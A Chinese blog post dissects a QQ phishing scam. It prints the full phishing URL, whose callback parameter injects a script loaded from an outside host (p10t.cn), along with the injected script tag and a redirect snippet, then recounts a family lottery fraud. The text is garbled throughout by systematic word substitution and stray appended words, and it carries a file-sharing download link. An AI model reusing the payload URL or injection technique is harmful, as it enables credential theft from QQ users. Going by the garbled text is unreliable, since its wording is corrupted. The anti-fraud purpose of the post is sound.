相信你們在懵懂無知的時候都有被盜號的經歷吧,QQ胡亂的加好友,忽然有個好友傳了個文件給你,打開之後發現QQ居然顯示強制下線,而後再也上不去了QAQ,很明顯,QQ號被人盜了。最近也是不少小夥伴私信我,也看了一些人發空間說QQ號被盜了啥的,以及我本身收到的一些詐騙請求。網上針對防騙這塊的文章幾乎沒有,爲了避免讓更多的人受害,下面我將會以最真實樸素的語言介紹最多見的一種盜號詐騙方式,淺析一下這個盜號原理的全過程~~~但願你們不要再上當受騙啦~!php
下面我給你們介紹一種最多見的QQ詐騙方式。數據庫
這個是我今早收到的一條連接,相信很多朋友確定也收到相似的連接吧,甚至乎不少人都說由於點開這個連接被盜號吧。。。只有不懂安全,沒用安全意識的人才會這麼說吧!!!api
讓我帶你們來剖析一下這個東東吧~~~瀏覽器
很明顯,你看這個域名看不出任何眉頭,既然你們都不敢點,我就替你們點點看~~~安全
首先咱們在手機端點開這個連接服務器
點開一看,咱們能夠看到,是一個QQ空間登陸界面,這個界面就是一個欺騙用戶的界面,爲何這麼說呢,你把這個界面連接複製出來,用瀏覽器打開,你會發現網頁沒法打開,而且域名成了下面這個:app
http://sdk.h5.gamedog.cn/apih5v2/getIsLogin/?callback=%00%00%00%00%00%00%00%3CscripT/src%3D//p10t.cn/app.php%3Faid%3D5%3E%3C/scripT%3E%3C!--&bqvoqvwqtujhigzkumjk.png
看樣子域名被瀏覽器解析成了一張png圖片,你可能會有點好奇這個,咱們用pc端按照這個地址進行追蹤,用F12查看網頁源代碼網站
<scripT/src=//p10t.cn/app.php?aid=5></scripT><!--({"code":-2,"msg":"\u7528\u6237\u672a\u767b\u5f55"})
就只有這麼一行,咱們能夠看到從登陸頁面輸入完帳號密碼之後會跳轉到一個app.php網頁裏面,咱們循規蹈矩,直接去追蹤訪問那個界面spa
有點意思,網頁從QQ空間進行跳轉的3d
window.location.href = "http://qzone.qq.com";
學過JavaScript的朋友應該知道,location.href="網站連接",表示從新定向到新頁面,同時刷新打開的這個頁面;
這個意思是從一個僞QQ空間的頁面上輸入帳戶密碼,這個頁面被植入了php的惡意木馬,經過跳轉重定向,直接跳轉到了木馬網站去了,後臺數據庫並記錄了這條信息,而後你的QQ號帳戶密碼就被別人成功獲取了~~~
若是不信的話,咱們能夠一塊兒來試一試
首先輸入帳號密碼。。。咱們就隨便僞造一個,帳號是3838438,密碼就寫一個mmpsbsbsb試試看!!!
這裏還要說一點,我試的時候這裏好像作的還挺真實的,防中文輸入,我原本想直接開口大罵呢,hhhh,沒給我這個機會。。。
這裏不管輸入什麼帳號密碼均可以過,除了中文沒法檢測,帳號必須是一連串的數字,密碼防了中文輸入。
而後我點擊登陸
看吧,直接就登陸成功了,還有這張圖片,這這這。。。徹底就是挑釁啊,居然貼一張小狗的圖片,是在考驗我智商嘛?
我嘗試了一下ping它的主頁,ping p10t.cn
ping通了,說明這個網站還活着。
可是登陸頁面顯示403錯誤,服務器拒絕訪問,我不是很清楚如何繞過這一防線。
那我也沒轍了,技術不夠精湛,我只能寫下這篇文章記錄一下,但願更多的人看到,不要再上當受騙了就好~~~
若是文章哪裏寫的有出路的地方,但願各位不吝賜教,若是有更好的解決方案,歡迎在評論區留言或私信給我,感謝你們的支持~~~
可能有些人遇到一些其餘的詐騙,好比電話詐騙,短信詐騙,講一個最真實的例子,推薦大家看一部電影,叫嘉年華,裏面講述的是關於電信詐騙的案件,這部電影是由真實事件改編而成的,很是推薦你們觀看,裏面有一些防詐騙的技巧,看完之後你會對常見的詐騙手段有了一個更深層次的瞭解。
若是沒有找到資源的小夥伴,我也會在文章中分享給大家一個百度雲連接,保存之後下載觀看便可:連接:https://pan.baidu.com/s/1CrYJ9jtkSqqxzZSlzQTsqA 密碼:2qlz
說這麼多,可能你們會認爲我在吹牛皮,認爲這些事情不會發生在本身身上。我講一個最真實的例子,我母親由於前段時間地上見到一張彩票,刮開獎說中了10w塊錢,我身在一個並不寬裕的家庭,按照如今的話來說,算是貧農家庭,還遠沒達到小康水平,想一想看,10w塊錢從天而降,對於咱們這種家庭,這絕對算是一筆至關的財富,當時我媽拿着彩票回家,和我還有我爸商量來着,我一看說,這確定是騙局吧,這麼好的事情爲何恰恰出如今咱們身上,天上不會掉餡餅,努力奮鬥才能夢想成真,我媽偏不信這個邪,想去試一試,而後撥打了上面的電話,上面巴拉巴拉說了一大堆,意思就是要交3000塊錢稅錢啥的,而後才能兌換這個錢,你看,這不明顯是騙局嘛,我媽又以爲,若是獲得了這個錢,至關於她少上多少年的班,其實說白了這一切都是爲了這個不爭氣的我,我其實也是很愧疚的。因此朋友們要記住,只要談到錢這個問題,要悠着點,十有八九都是騙局,我媽最後是按照地址打錢過去了,而後事實上,對方並無想要兌換的意思,巴拉巴拉說了一大堆,好像又是要交錢。。。我媽如今才意識到被騙了,而後跑到警局報了案,警方說,你不是第一個了,關於彩票中獎被騙的人一大堆,他們說沒有足夠的證據線索,立不了案,沒辦法了,3k被狗吃了,這但是辛辛苦苦東奔西跑的血汗錢,這些騙子也是一點良心都沒有,因此。。。後來我勵志要當一名網警,要把這些逍遙法外的人繩之以法,天網恢恢疏而不漏,這些人最終必定逃不了法律的制裁的。
關於盜號這一問題,我給你們提醒兩句,只要少一點好奇心,少一點貪慾,多一點警戒之心,不論是什麼類型的詐騙都不會出如今你身上,謹記哦。。。